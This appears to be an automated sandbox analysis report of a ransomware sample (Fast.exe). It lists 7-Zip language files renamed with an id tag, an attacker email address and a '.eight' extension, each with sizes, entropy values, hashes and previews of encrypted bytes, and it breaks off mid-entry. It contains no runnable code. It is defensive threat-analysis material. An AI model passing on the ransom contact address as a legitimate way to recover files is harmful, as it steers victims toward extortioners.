    Preview:b9..a..L....%.B8..dK.;...?7T....t ...`...}B?..z..IE?O..K....&..{.O....*.....w.1..... O....2....../...e.`..4.....2.q ..zpA..`p...+?..`6..3.*...Q...W.>N.....zTw...Z...n..p..~..}W!..?P.......+w.".\..U..d...1...k....y..j|..I^..]P6..K.?..Cw....Q...Z...@A.t..'.......Ba|.(....6.[...HQk<)..h.4.....3.1...?.Gb.Wh.T.:...E.....!.|.6....k.. .p.D..<......0yB...j=RQ.5..58RC..L...Za....)f....Gzp.A..M........%l.s4.\..I.@U.A........H..../.Q..'...s}q......../....:.L.S...1I.....O...|.....q...l.e}vj...:.#..+.l.U......y...RG.l;..\.....?.^..@F..T0.....#.....v..3.?.@>.p>0....NJ........v...2.......~&....<.....r%!........t...k..a.A....KBWD.Z.$...P..6,MX.3!1..$...ja.f.....p...c2.-{.....fQ...n.xs!.0.f.%4@...o.P.N.L@.j..{#.9....$MQf...e>.#.;..cH5...0j....n..f..p.l..S.......9..o.......hE..<.....".......S.."j..0..Qt:n.,@.H]..+D.,..{'.......9.D.b.l.....hDW.".........<.;m.{..b.F..!X".v[.#.=.T...n].8w..u\E.?+...RS.-(.SG...1(.>a47.p..a.G.~..}..'....%....*.a

    C:\Program Files\7-Zip\Lang\ga.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8546
    Entropy (8bit):7.979961054280646
    Encrypted:false
    SSDEEP:192:9Oq2RfY1oFwsRwsUvq+Jwxy7kYLjtGysOnQIhf28A:eRmoysGsVA0yHPZA
    MD5:8D5F9EAAEA02AC3407705CB0372B22A6
    SHA1:95BC6E9C59AC3964DB7BA4612206BECAF267CD07
    SHA-256:6B7E5EF01D94401D8FF56818AC7C2D719443273AC8E74412241DFBC4B06630CE
    SHA-512:DFC84FDEC9B12E9F93F8BDC1C56C188D866BFE3DFB6A9A1FE84DA64E8660FB12150E076E3FAB6DD47EA1870AA6D54F46BF60E88FCB7DF35E95495E3AD080E208
    Malicious:false
    Preview:LL..~.....$...d......h......j.9.,...7.g.M...AOGB......hv..Y.Um..D;.(..9&.X.O...E...E.H.T..H...).....a...b.k..b[v.H/t.F..........e...k..k.s.!t.+.4t9...`..,..Df.u.....Y`...gR..%..P...e...adEgx.mB.3.a.).V6...;..<].".H..G=>$.............3.....9.....WG......8.#.e{.4..h..>..[...../wd}.K.`....vJ~m....N`Z.......C..Y.f....2.%.J.J9..f;.(...t.}I...Q6...C.C...:...iyLQ(...c....~....A.....y...DN..w....5....UY...KS.k...\...h..h5..v......O..w.S.a..tP..{..p.Ow.6..\..........@.&0..H.}......~....T..(...ql..........k.|.`..Wp.7CB..?...fr..:....%.8...lk.f|....M.. ...DO. .?.v....I...M..l+...&.s0...cI.w....#.<!*(.....3.:.R.q.343X:I9..!.+...........SJ.@O.....Z.k.(...d9.)......<..x.i..7.Q....@.[dT..4..T._<.>.....B0f...T.}:.!.|....hX.!..3.I..c../..cK{K%.-.|...W7+P.n.#.{...]....%.O3.-..<.Ar|.k..P>.*l.E.s...l*..Q..Y....t...~../?.`<)=.5..O......h.C".......YV....w.....O.5..Y.....2..o..oZ..Uy./.......C.9.J.}i,..6..~7%.77j..7..R...y.$..Lo...%2..u.......Bh..}.8

    C:\Program Files\7-Zip\Lang\gl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9842
    Entropy (8bit):7.979345793661522
    Encrypted:false
    SSDEEP:192:FwB0OtL+5DyF2/rFyEjrv0rHJul1miiZlSNnezOAAjfWvIB4usCJeeA68Wn+4A:dicyFuJyKIrd7SNeiXfqDL4A
    MD5:960A40B2D7FEE4AE04DB8B28E685A66B
    SHA1:209BD71103B0491A8E8AF4F8E15F9C5A66EC93D4
    SHA-256:5E9ED4EE071D1EA6B42011257FC23FD1FA61D09965154C9C1558C07839F36AA9
    SHA-512:4C8C98CA6EDA43E840F46B621D30553F99B85DF13305A6877C8F428154CED52A4296632E93E6DC086AA5121520784D8E6D89D6B4D7B127E98A9620FBF4002753
    Malicious:false
    Preview:.d.......-.=..e....@..m.M6...U4e............S.<.8o.C...fe/..~7?.8m+.9.....M*.".Z?g58.y.4..W....XKP...+9S9{.U.$..$..D... .5.*..*.].,]hx....z$K.^).Z.Z.`.yG0(R..k.2O.9.I~..l.w...LD..x).....;..1{.w.....BB.s.4.V..l...P.$...`.....7...N....S..A:..qKb..K....#._A........8pS..f8..sd.Ga.I.n.Z..gNh.....D1....+.po.....*..b...y.0m. . .r.mr.....^..F...D..`.....).h......p%.....q..M..c.zpi...K.>..EQ.;.........).0.[<.].z.G.|]....i..%.%...{...t.5.......a...*..~Z...<c.0.i.c.0..i......0z..;@.0z..r.+..9)~.O...tpu..<.J?....=..+..o...nSP{.=M..7...8*..y.......|...W......."./o...R..y..14\.f.%d...d|....... X..k..%4..X.&........H...z..K....1..r.j.Em..4...HC..6-.....dS...>..I..-IC_..........}....{..:..{..*....i*.w..g...w.t...XTe....31&X:...?`....?..0/.B....)?"..G.k....~H2..........^."........%36..........B.I...=....R9...e..{......D...aBT...=P.\.c..O%...<e..(^...1..P$.......4...&...k........."..E.UhzV......u.*....2.K_.&..#..i.!.TD...D......c..:..]|.`N......i...X..5...

    C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18002
    Entropy (8bit):7.99009959487427
    Encrypted:true
    SSDEEP:384:O/fzkbQB/07AxPyIKKysTDl2kURQYApMdRPZ/ARwFcrAaidJTjlA:Iog0UxPrKKZJPwPZ/AGFBaidJTjlA
    MD5:BC0A1BC355216782CE120A15B08D231E
    SHA1:76E294989F682647F37ADCA13B9B2F7A7C098AE0
    SHA-256:4E2C186B890FAC76CA0B116B22EC5E18085C21868D0E25048D4104D7997DC35B
    SHA-512:74961FFE9057E20A4A863293E3458E8A065D9C09D27E4CD2B0381515DEDDB8D4FCE3CFD6D6C8C3D0F2B91B26E9D1168D69CF901CFAE01A4F22176BA2CB09D0CD
    Malicious:true
    Preview:...d8{|b7...dJSWrb7.........z.>.....J..\.+H..v....3.!.D{..^....<.....a..D.^O..x.c.P....6..j.........g+.&..B...;......O......._)....}...k.......l....5d..3.P......o..R#c./....c.B..D.#.2K.m...WI...L..... ...U.....[..E.(,j8`.X...0b.^..8u..==...I.,.FxW......mP|..% S.E.I.P...X..|g(,hI.\qd...4......b9$..b...N.G.u...[.wN.....p}.}....j.Ca.z..x`.."..1..??.._G..~O`.....S...9\.'.E.Y.j...+..oS.4..0.J...d.6.....c...p.....,..^'..1.......h.d|"...+.J..}[.......2..F...:........?5...B=*....B..E.z...c....g_;p|.7..>Z...H.ly.G..~e...|.=6./N....9.B..,..3../.,..3.w0.T..W3........P."......Jnw.=.....uo..c...n.....2.E.@i].Tx......I......D.4.g.M4..k.P....W.yY..../....9..TD.'.o..m...BD.....MkO9x6.,..=D..B....t.3.l.m...m...2...<..,..GM..8.n{.g......gQ5f.W.y+..".D..:..).........I.1.G.E...D.t.PaW..T%@.6..4..e..>7.\|Af]$H=..*..\^~.2q....]....xR..L8...l....c`.b...1})..E&JY...j._..j....Q..x..E.>...w.....5..t^...'...a....{..i.......,....4.X...q..o6.....E....-...*.

    C:\Program Files\7-Zip\Lang\he.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11634
    Entropy (8bit):7.981613021233144
    Encrypted:false
    SSDEEP:192:ZNEchi9mE/gjD/pTR6j17kRMmsn0Cv24lzLWZANaNnG+SyqzZ4ze/F6EdA:fjhi9mEe/pTRbRzsD2YzQY0G+5FeNFdA
    MD5:962460FB270D6EFAF939DBA66B79B0ED
    SHA1:2FFC298965799CD61920111168BA9DC92948061C
    SHA-256:390F29B323C21C862CFF12489053935DB175291D98519AA3E072E19B2FF868AA
    SHA-512:33B6D30C2FF343EAAAAB1A2D4549FDEAC8B877529F8A81A5EACE394CCDDC277BB0DAD5D0C0F0B9A6DDB3C30AB85C27CFDADCFD7D25FB49A18D6BDE709CFDC5E9
    Malicious:false
    Preview:YK.0..[.._.j..&x...@./rT.Sq.>.R.P..O.*..........m..8.Z.%..}.)......b.#...k.|....a..>0.......).p..l...(.F3W-u...w...cD.OW..`..o......&s.w..2..r.!h|....z..8.EB..4...V......,O....G..A.T.....ye..dC.jKw].Dqd..&....3..u(.'^.G'.).>....f!|.5. IyHy.TF:p.\m.6......)..Z+v..V..8ucG8Y.}!M!..-.,.R>..EB.X..Q],h..|.Rt..k...#Ws..\%...F.....c5O_wM.?.....3.J.....t.g.<'.Yb..}..w<%...9.P.....3.6...........k.-.K....F..V1.1-8}e9....-..jg..~o.Vi...K......*...d.-;W..N&QY.."P..."WP.!.,..2O.z3...o.u.L.a...O...Z.K.......:.\...L...I..e..Sh...;R...D....A../.f.:.5...9.(...N.......;.*.j&zM\.e6Q7'..J.....~...'-.....K5...t..........E...0....P..K.K@.<...G[<....ex.Uo~..v.[..@O....K.2.1...#h.&.jk...;2.sE............<'_.-......m[.R.,.!f3.S.?.QJ+.....b...2..%J..U".2."......?1P....7...0...".`.dR..<......^..p...H....[...........Dz.X._.......i.....m...[..%.......1..J.AG^...jv....W@.0W=X....@....]..qG....[....-.el..iOL.+..SM.mB.....>[S...raA..-=..H,.....'.,sT.]..q...0..6.

    C:\Program Files\7-Zip\Lang\hi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18098
    Entropy (8bit):7.989995835799088
    Encrypted:false
    SSDEEP:384:84ntDOqNCmro79wUmWa/w0vVSyPrPuOekNgmlxTevIvhteA:8GHVr6uo0NTmkN1xachAA
    MD5:F0DFF1E9BA664669D038F8209B525B0F
    SHA1:B0589627023BC6E78AEB60F553F3B3806D8534B4
    SHA-256:48E19364AD9DA86837DE3F88CCFD02A3052244A084BD0C2890068C6C66A1EAB5
    SHA-512:5FCBBCB2B982D858E144C89655C85D177B8ECB59B6DC04C306434991125BAA16D188DA0DA5BE829DB911ACE6F20064D12313636C9072A80F795E344E46D88466
    Malicious:false
    Preview:.1G...-.9.......jCWzW...-.=.Ku.pZ.Vb.t9..j...w.g..Yt.....c...-...Le.#...j..m..:..V7.IJ......QT........V+....Pw.....D..zO.0kC..x... ...,.7MZ/.).l.<.rH>ef'S....EUUZ.6.P|va....Y......{(5....bN..].Q...*.gKp.P.+8CJ..:..8...<W..s.x..d..!N;.#....x....w..)p;0.Z6.........c...@.')..{.....2)%u.B. 9.T)B..$9..&u...x.v...9t..;......-.n.#..-....)*NZ....;d..2.a...U.B@*.U.F..h......1g......`.9..SA.3.....a"..|WP..\..W.{.E..d.r.HQd...-..O..;..s.......ak..br.^Q&n.[......7......n..i..uKZ.rw.+......c[....f...C.r......|q......].W...b/..{.}h..hmv.`g......)!i...D..Y..<`...3...s...j.kc..6b.."+$......CM.......D..I.AO..J..w.....\.7cy....b.1.W.....k..v.)..3&..A..L.....D..X8Q...0?r.6...^L..|.wh..q/..K .t.h./H..S....A..K]PI..YL:...<.q_[..CO.....r...R...N.....K.\X*.k....k.d.^....a..W.j..,....)rt...#..T*..JdV.` .`..9...,..G.....v..zu.B.{[.....s....{...o....,.....l2.EOA.FP.{> .."....p..4.......h........(w.\.4s.H.}J;......v..v..y.."..r........a....K....G>.

    C:\Program Files\7-Zip\Lang\hr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8850
    Entropy (8bit):7.974865020979707
    Encrypted:false
    SSDEEP:192:ZQPO4SUpOljf8W/9kdCY8cVlOT9m5q/1W3nBPeEdbTA:bUpOlQ4kbjmwU/ovTA
    MD5:9E6AE00E37C4C8C6BEF2788CA3C7C2EA
    SHA1:D4081D0378F89C1F80E9AC786C599B7B9EACF4C7
    SHA-256:2D09709AF87ACCB14C092A842B5091041BA16B8C9CEDF4D0234AB580B88AF7CE
    SHA-512:5C58F2D2CAE698FA0C96FF257E588A3F504193CCC1C861BF2700D9B0FB2FB9DF77CFDD148E8CABB10B94FE9CCA8866AB3CDCB8C2F2E4DB5829A787E704DF97A5
    Malicious:false
    Preview:(...<.~.......:<..D....a}e.3....Sa....*..6J.....lS......:vT....RL.....bp..R.LU....q).....,.....]...M&.|.uzd......:.>]B..GT.LE...a..a..X...........3".B.-c.......=.HQ.....GMe..v.....6....S..czZ....x...~...R=...1..v.....<..Azpq&l>Oe.._..Bb._..*:y.Q....c[.E..h.k...yM.h%...{]...|X......h...C/...5.G.y.+.GJ...]..4...[.tX......].}..B.K...=."(..lV.. m|.t..\.aro..6(...w.$..>....Ei.n.{._..$.../j...+. e...*u..*k@......q........Jg..0=dz%...RR....L/~...C.OO.p.$....7...}..'V."?.,}....E.$..._3_.;....l..eL..9<.N....6X.-Aja...q..S.||....|R k..!.f9....@.O......@#Y..y...K......`KB2O.j. .[..u.R...}.....>P.@.'..2._....].8.(.-g3".t...&..95.7.8.z^Te.....d...G..9.\. ......l.....P...Sl.2..tI..rk2....O.[FB...e.....H.....k...ony,A./.............7u...+.Hy..l.L.G...@.f..S.U......s*...%....15..& !..Y........w..S.:...q.2?.W.(s-.h=.A..4.l%^U.tJ.Pc}Y.SC....;.lO..H.9..;`. ...G..|ul.Hbg.D.@M.Jg8..Z...|..a..@pq.hX.Tm.6.!.F..C.i.7.}...,.$.~.C.wQ_........1..CL.R..,.Y....

    C:\Program Files\7-Zip\Lang\hu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10418
    Entropy (8bit):7.981593327853759
    Encrypted:false
    SSDEEP:192:ZQCZtQjZWBanBtGdLQ0eOSEYPvSAHFFskzQST/A+1Ro2JFStyLhGEGXA:4jUwBtG+BSgvblP8ST/b1NF8A
    MD5:5941B01962A37F0C78A5034534B04EDE
    SHA1:914473F7DCA1CAE42B7E23B134CF69D5E5289A00
    SHA-256:47009519ABCBFEFEFDDFE32F1D7C977260D922D32792D1EBDA50B0E86C155440
    SHA-512:FC4024D8ADC70DC7AC811A94356FF4B7640465A00067549BFD89454B31BBDDD64F10593259768C27FF3BD7EBC6FF0A5667E58642E9E5405335E37277E8C729DD
    Malicious:false
    Preview:..;.&......$ix#}.0.dO..%...|.U....[.n.*....-...Rq*SB..m.{.......L...o...........}.....H.Zg.\%F.ceI./k.9...H..v.:..J.nx...mE...2.C.G..!..)U..MDK..3.d8.?.(...r...b..vE.P...L+.F..)d"..dD.).fI.|do..w~.F.>..k.1-Y...a........'...$Z8D.,..q.L...'.D#._^.v.S.M..%.......R]0....0.F.Xy..m8W)pt.L. ..@..../.H.6<...+T.._.......pO~A....KTd.......x{..\.|...K$t....U.k........c|5..@Ej1...w,.I..2.r..;.4&.O..9H../.J.~.....o...w...E.A..1-.hO........~......;x...=..j]cD...R........0.......<........T.....\..1....d3'.......K}.........S..E5....]...2k\+..Z..<s@.7...bZ'L...`.{...I.p......E....4>Xl9.CR.,.h:.w.............mC.._......Y.A...e.........(.......$i.,1.B.A|.<..=p:...W..hp....O1....H...yA(..M..%.....T.T.)...w...27.|.q./.._r._*..N.......:..>=...^U.:.....Dj7|6+.....J....$a%:.7.u...o.G.r_i..&.B_K..i..2..m..M.....D.vC..T..r..3..j...X.........65?.#..c.K. ....t.|(...K.}...$C.#...B.w..p.h...{N.. .!A.Nj.\\.O[.bo~\L.t.<s.M.6F.{.yd........qS.......).w]..TH.p..~+.ZI..O_.....V

    C:\Program Files\7-Zip\Lang\hy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14370
    Entropy (8bit):7.9874640015807055
    Encrypted:false
    SSDEEP:384:gjMT8o1BCkC6cCJJP3+A+iW3qpu1ZPahZbgPDiPM3A:gAT8oPCicsmxx3OuvywPDiPM3A
    MD5:4352A0F91F75B8B96FE53A4CBCAA8732
    SHA1:84CFF6833E8F1278F6DC9EAFE88E4FA03417451B
    SHA-256:FAF8C252B34504E1204236165ED19F2B6D65F3C8EA105B33DD0302517ACA421B
    SHA-512:659A6855C3186D181C422C235E1B7DFBA52155B64E4E5B4672F3C2028FACFFD906666FF7743E30F519283B52CF461D56985EDA478BF7318334D72348D51E5A03
    Malicious:false
    Preview::.y....../{)t...d.o..n}.u..pn>..............j!.,..*....yA.^.....p..u..}g..R........"3.Kv..y.@.Y.....J}J..?'.L...U...........h....[......q}t-.3F.WNK.p...mI...M.....".R.xG_..-..trF...*..Tk:.....".\T..[%..f.X...^..bM6.O..6=....H..y.>;....Q=.h...D.@.Uq..#..I..V.......U\!9(i...........]/h....^..#......Y..Y.2m..\~.5..cRJ...'..z.P.7..[...).C.....+`.......N.\...NDL2).....E.. ...Cv....g..D.-...8<.%R.@..?./(H.AT*.Ci.:.......xXtf.!...!....s.{..q>...Pg..g.._...[...,."H..|.I...0...okq*.k.....[... c.[-q..V.R%.........4'..56..]w.j..`....+.......l..m....W.....n.z%..Y......5q1..6^?o...@:.Z...H......xL1]..C.G..yE....H..5..._.0.:..~D.D.H*7#.;}.h......Y...d..-..)]..l....la.g..b..$.F.@..f.;S.:p..P^......^..q7.u\...~..Kkx..T.....k...~.8...N.2_2wuo~5+.sJ...+oI..E.J..z..{....-..n8f$...x.8.l.'2...M.+&.%X..qp.c.C... .R..=&.........O}..... .6<#t.].v.FG..+.]Y2 9.*.I.\..-.W....0..,.W......j...,..d,.h.>.X..a..h]..V.kJ#f..}..].Uw_....i}.......P.8D......

    C:\Program Files\7-Zip\Lang\id.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8898
    Entropy (8bit):7.979225861261048
    Encrypted:false
    SSDEEP:192:l3ddzSbdr7PT5IwMOiE1+cLF/H9XieEPL2HiFmT7/MyOA3KWC+8A:JzSbx72wQ3cLF/dyeEOiA3qJ1A
    MD5:1F305CD6CE9D197E315784BABBEC4A5E
    SHA1:4CCE5AFD27FC3C1E6BCC633A81B5E535E2553AD7
    SHA-256:F016147E2D8EA4EFBAAB69DC945F9CBD3F1F756D836E752F70703D382628BBF5
    SHA-512:330179202FFC4E52767997AE2CBC2B8D1C65BB7CC9A57C02B08579DF9B16969C65C73E884D8812C74B645C75AA92F3B888FB4001738C895A78874BB2DFB69AEC
    Malicious:false
    Preview:Y....JSzp..b..Y.x..>......R..=..B.fJF.%..E...........Ht$_s.....[.k.....y.....~.z.=..aD....dg...!....RV4....VU?..S#.N....4....9\.0#...#.9...v.h........a..o.d....H...$..j....H&.&.7.=v..|{.........}..e.@SJ.`kVi.ot......5..-.`....Wj.......E~.....ID.......h........5.JY..k.b@...WR.9.m........({/.W.FQ3.5.0..E.Wl.Z.m...,.C.W.WD..[|........j.'%O|...K.5..% .Hp{~....tf.O.K..`^a(.T.Z......m.F........a......@......9..&..N.J...Z..l..6...c..d.} .......r6,mQ.$...}..J..G2.@.d6.]..m.Y>.5J....%..:.B8.~I...$b....T...j.m..^a[...`..-Y./..Qn.KLS..v.g...%,"..D..."%*..0v..xq......F..v?....|RV..6._9.zE...i....`...-.....3pGu8.P.c.p..<(..,....t.i.U.Z.(..j.~..c....:.I.}.. ...,..~.=`.....:..,....a....}...A.{c......B@...*p...v.p.$.b..N-e..dLP..uR......G...L*.V........|..?..0K.[i......5X..@..........l.^M..n.Qj..p....<]J........W.{..#B5.:{.....&..`.V..y...F..gK..?G.-E.<.).vF....8..y...+....u`M%1U.2...?........m.....t. ..kV.#..]..EUR..cy..x".P1h]....@Z?.F?..=..E(....."..S

    C:\Program Files\7-Zip\Lang\io.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5250
    Entropy (8bit):7.963234593976603
    Encrypted:false
    SSDEEP:96:58o2yXDo12FTXGdM6um5FcxHZAphInzuHaw0E4YUl8t7zbU+5y+vHeA:eyXDo1OGW6fFEHiInyf0E4Yie3Uw+A
    MD5:660BF5D719E11E1C06AEB09CFDCF0A1A
    SHA1:4A74320953D44FAC67486B11A0E18C3DBF76DA2D
    SHA-256:4DE834C85110FDE0B5A22AE5560B23FD6E7CE25EF6B8CFF572DF3CA75E1691BB
    SHA-512:10EA20E11D07BCBFCEB680BAFCEE6B45B9F01D691046936EAD4F8C6453AA0BFA14B8214C294AB3350A66D98BEA4857E20C9903B4124DBC2E2AC22ACEE45F57B7
    Malicious:false
    Preview:S=G....#..0...j.e....^.(.H...T..=X.7.L.U..{fqiY....@A%....E.;..j.G...b.....Z...w..... ..H.u...2....9..1{..*.^<(.k..{..z.......mN#.J..}1x2G^....T...-..W.F..C...:.l.Z.-&.X=.......k...5..dP..g...{W........Yc.G.J..-4..M..q......hx....q..a....4}.([".Ae..EvE.J.|.:....)...~.JC?.`#..1...xiJ.w.....uu.X.T;>(.,YE......Q\...D<....\^..j.:............{..j.[JV.b..;...an.e.9..i.m.,l...wAg`*y...8.."06....z..Ebp.b...1`2..:...Fss.Q~...|wq.5HaxW/..x......,L.}....B..w~...gTPt.n~..0J.I..t.o&..IF..;.k.*...4$.#7...l.......E..Y.....bda..F<=..z.Q....B.*..+n.A^...I......:.R+..N>.......I..E..^.H.i..'..@.-.|..'&Wmy...gG.[./..M..(.......)+7y'.B.G!...7j.Y. :F^4..F.R.om.X....}.z.:.X?...T.Z...:..\5a...[.p(..).Z3O...7..l.3.+#...s.JnXF.zQ&.1..i..o.HHc]\....bp5..M@7F.6k...I.#F..x..:2..{j."..,.`-.....8.f.....wi.Ma....Z4..-.....l..5S.q<@......@.0W...kwSs.v0...+..0RVdrX....#=....q..F.w/.).g..}.......0...E.`.S$%..ArfLn.............3...i8.+.....9.v.S...0m.."....w...)...2...*L....

    C:\Program Files\7-Zip\Lang\is.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:Sun disk label '\251\272KP\204a\376\240Z\353\353\321\314\222\262\353\260\220\004e\207R\032\023w\214)3\216\317\011 \275\277\366\003 F\225\277ea\245\270\375\003\2448\335\233on\025\005\217\220\313U"A\247\211\373yz\351\331_\200\014\336\010 \275\277\366\003 F\225\277ea\245\270\375\003\2448\335\233on\025\005\217\220\313U"A\247\211\373yz\351\331_\200\014\336\010yz\351\331_\200\014\336\010"3Ue9\303\254<_\355\030\265\277\352\361;\00684J\311\336\230\227\324\203T\263\032m4 \266\241\341M\265#K\315' 8125 rpm, 8779 phys cys, 15291 interleave, 23137 data cyls, start cyl 426938426, 620664674 blocks
    Category:dropped
    Size (bytes):8978
    Entropy (8bit):7.980362113371765
    Encrypted:false
    SSDEEP:192:WjpfJqTZOQs9MrL8M/8+r2Oeo7Pjy5r0kB0KZcf1Fdfp7S1NBLquSj5OuzA:ypfJOZOdAL8M/96o7Pjy54kBJZctFdUb
    MD5:CBD5BA94375C6BB4BF49FCD0AC1C0637
    SHA1:17C3F76BE695C2AE918BA70EB6EFBA5269A27F53
    SHA-256:17744DC03119048779F7E45E9F7267AF7267E9701086CD6FA936562404C30502
    SHA-512:3467BD779130E61AA106F36F21C3584E9B6650191D566E34EA96FA99B95354699A39B55CE95F74F89F51EBBB57A5CB932D576EBB4A265D45C767C57DF4490243
    Malicious:false
    Preview:..KP.a..Z.......e.R..w.)3... .... F..ea.....8.on.....U"A...yz.._.......h...4.T...BP.....)."3Ue9.<_......;.84J....T..m4 ...M.#K..n ...]....C}..>.l.Z....O...IE...8W...d...J.ieB..D#.x.Nl....2...5H......0.r=9..)...d.m3...St..9.N.fr]...D.....|.K.7_..C....1\h.....L.....{.*.y..!.a..=....2Ct....'.....d....i;.8=\..D..'BY..#Wt..K.?^....B...K..2G.....q3N.O..Bj3..jp...Z..aw..YD..^.R..K....X/....I.p.6..!\.[..).nCO.3....x..F_.Mc....fq....i........ig.B..j4,.F......K"3.wh.z.;aZ......#..:.r.b..$....I...n.-....G..$...Q..|.z.m...D....BZ..Z....D;Nd^3.....p.BI.y.|Su.j...'..x.^.h}....A....).`4.`.j....t.o..Y;.9.`...#.l^lt.P.(.VJE.'..J....yw...."mu!..[^D.....<&.b$....]p...P...._.{{..[...X.5.|...+UEQMD..pu&...&@j.)..^......B....z.H....).).........%.....Y.."=..H...][.j..).l.%$..]8@..SoFH.D.R.`...<...rU..{1..&..eT.|.T..a.u..m.Vt.;.)!..*8..u'.*...wx..p..cR..:*W.....A....HP.b..n..u..h7...3V../0...._S..Q..'%.h..-y.''...._.E.e.>^>...~~.m.$M.^..r.6.....b.......2..Q..

    C:\Program Files\7-Zip\Lang\it.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9986
    Entropy (8bit):7.983502395736548
    Encrypted:false
    SSDEEP:192:M45xaX5z9HPQBaAp7wQu2Zi9xAcL1IqJNVPqft3WgAyi58A:MKaX9+BBVu2+xAA1t3PUnAx8A
    MD5:F8358F51A698FC4FC8526069487B0F91
    SHA1:05F32E4CC3E65A576AE655A2E8F27BDF2E72DEDB
    SHA-256:5518C1D05860043C21C73CC7809E6222424B2132C677D76A45A5384D08165D94
    SHA-512:7E9A3121B96091EBEA67D9F26FE89BDD8EB4D8B46325631BFD2ED56FD454C65F7980A872D4F81DA1EA48E970470F8CDC8515610A18402A2A171E8EAC9B31600C
    Malicious:false
    Preview:;......q..!...5.J...T^.........F:}....&.L>.P.UXr.e...3ub.b#}U62z....Ux.|&.N...-.......P9.....Y.....#Y...y.../I..P.."'..;.[.m..W(A.w\."s..p.W$.P..Dj.,m..n?.F..q.y.h..7....Z...&.....L.X.C_.../..}..M.R..m/CM..tQw..m.rl.@(......Q.A.Q.g..,...u.2bqJ1.P....:W.....s..].fB.....R..F..oHI....P.a..3AN..+{.'..}w..MM.3.....#..2{......D.....T,a;D^.J....4.]...d.k.....M..0d6.<.z..v.z.LV....U.2.<D.=_.t..."-...5..".[.T.K.i...q..)..`..p..rLdA@....H._....a......._ Y..Zuk^!..T-I...;4.y..U..lw.*.\...*...'b....IJ.t..(.[>....l&Z..W...4.eO9jx^2S..S.q..I....!'Pp..njm.gr..K.xC...-H).O#.&...[*..Y`..A..Q._<..|..e*.....).Y}...|P9..)W%.J.rN.b.85.v...7.M%..Lv.a.E*b....@S>..=..C....d.`e.....~.......R.h.Z...-..?d.. .X.{aov..&S...T.....;.izL"3,....+...THN..x.n.....X-.T.....U>zmab..Y..-s<.6.&.~....Eqy...N...P..+.Eg.......{, .[..]....v......q........^......._.).7G........i...#.wO!b...5."1\..RY.).Y...*./A...n;}L.6v....#jd(T..N..EZ.......f3I....bil.Q{.g.Y{y...Y.#..........f{.$.t......

    C:\Program Files\7-Zip\Lang\ja.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):12450
    Entropy (8bit):7.983451637957112
    Encrypted:false
    SSDEEP:384:IRFy5WjKZB2xRwJmbWrUtHvx5+X4GNiZA:IPy5WjK+xGJVUwX4GyA
    MD5:9DB4DBF00BBA0AE51F3698B04DC898C3
    SHA1:8C997F7FE0FB414A3327EAAA532429B2D17A8ECA
    SHA-256:DEDB1EC9B770D4DE1BC0FBD0D765A23C75CE7AAACB476BCFBA1EFC1229A1DE8B
    SHA-512:925C83BB5B68FFC4F207F24B81504C7DA5218C2F13685DA565F0F1FE891376D1B9103E072A068B5FEB39E3D6910CB6DD4D3EFE58476BF8BD64DDDD7DE98B69EF
    Malicious:false
    Preview:..).R$...dd/3........|3_...]ul.U.F}e ...m\7_.......P.~9..x~.....z8.".+;..9......%..<.2..n."'x.5H.....%...K'. ..2.N8.?..@.......7K..S+.=...........w...#quj.4.$.B..!..........2;.=}..R.....J.h.=.7g...@.NO.....U.S..u...(qj.]..H..~>o.?.....i....6...>.......U..,."..>.3\7......u;t}..sXU...tY..GhT.eM\..,..$.e&bW....J7R...}r.....'..?.*...b...Z...4W^..:...=W...UP.:/..4..u"..4w.G.`&) ...5..<..".....PnCM.l>=.j=..Iw...E.&.$..` .2..M&|h>....Y..{......^..fu.y...>...i}..|Y..V.........k.6...+.nTw.v....-)...Q`..:...0f.}.n..jg.:....1i...B..;.O|.....`.&....&.f.e..y$..d7`.E.p..A....GZ..o..p..9r.r.......s.!.....C....t.j.u.(}.V.9..!...:....N..5.~*...2a.88.d..p.g.......7.5|t.%...............n....P..Y...1v.6.O.....eU....lC%.;.2..j....h...oa.D..!....|..9..K..p....h..IP]........|"......AA.>......2a..$.9...=z..k....8..=pi...[!....................+e Y=..~6......Pd...s....v..vT%..\)....1.......se.f..LG`b...%N.c...9.....4|....c.;........=.;_..m.!..yP...C..DQ..Bjl

    C:\Program Files\7-Zip\Lang\ka.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18434
    Entropy (8bit):7.988732637873703
